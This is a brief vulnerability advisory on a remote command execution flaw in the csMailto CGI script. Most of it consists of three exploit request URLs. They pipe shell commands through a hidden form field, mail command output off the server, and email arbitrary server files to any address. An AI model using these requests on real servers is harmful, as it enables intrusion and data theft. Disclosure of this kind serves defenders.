CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability

CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability

Multiple exploits are provided by Steve Gustin <stegus1@yahoo.com>, including:

- execute commands on server

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform

- execute command on server and mail output to anyone

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform

- email server file to anyone

CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform